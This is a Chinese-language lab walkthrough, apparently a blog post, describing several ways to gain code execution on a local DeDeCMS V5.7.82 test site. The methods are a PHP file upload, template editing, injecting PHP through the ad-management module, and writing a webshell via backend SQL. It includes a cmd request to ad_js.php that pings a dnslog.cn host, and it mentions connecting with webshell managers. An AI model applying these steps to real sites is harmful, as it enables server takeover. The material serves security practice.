当前位置: 首页 > news >正文

DeDeCMS靶场攻略

news 来源:原创 2025/5/14 7:20:39

文件管理器

点击模块,选择上传文件

 在电脑中新建2.php

<?php phpinfo();?>

 访问2.php,验证是否成功

 修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

 点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

 后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

 点击[代码]

 得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

 在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir 

 在得到的目录下写入木马文件

 访问后得到12.php

这些成功后可以用蚁剑,caidao连接 

相关文章:

  • pytest的测试报告allure
  • MongoDB 配合python使用的入门教程
  • 微软产品的专有名词和官方视频教程
  • 柔性PZT压电薄膜触觉传感器在人形机器人的应用
  • Android Launcher3终极改造:全屏应用展示实战!深度解析去除Hotseat的隐藏技巧
  • 如何设计大模型意图识别?
  • 学习笔记|arduino uno r3|DS1307时钟芯片|Atmega328P| 设置时间|读取时间|无源晶振:DS1307时钟芯片实验
  • 2025 使用docker部署centos7容器并且需要centos7容器能通过ssh登录SSH 登录的CentOS7容器
  • Linux CentOS7 安装 ffmpeg教程
  • 【总结】常用API架构类型
  • C++异常处理时的异常类型抛出选择
  • 2021-06-15 C逆序存入数组的元素
  • 韩顺平 一周学会Linux | Linux 实操篇-定时任务调度
  • 使用C#创建安装Windows服务程序
  • 第一个Spring程序基于Spring6
  • ROS从小白到入门:知识点速通与面试指南
  • CatFlag 原理
  • 密码学(Public-Key Cryptography and Discrete Logarithms)
  • Docker 部署 XXL-JOB
  • 粘包半包以及Netty的解决办法
  • 5吨煤炭“瞬间蒸发”?掺水炭致企业损失千万,腐败窝案曝光
  • 中哥两国元首共同见证签署《中华人民共和国政府与哥伦比亚共和国政府关于共同推进丝绸之路经济带和21世纪海上丝绸之路建设的合作规划》
  • 李强会见巴西总统卢拉
  • 福建厦门市副市长、市公安局局长陈育煌出任吉林省公安厅厅长
  • 【社论】个人破产探索,要守住“诚实而不幸”的底线
  • 外国游客“在华扫货”热:“带空箱子到中国!”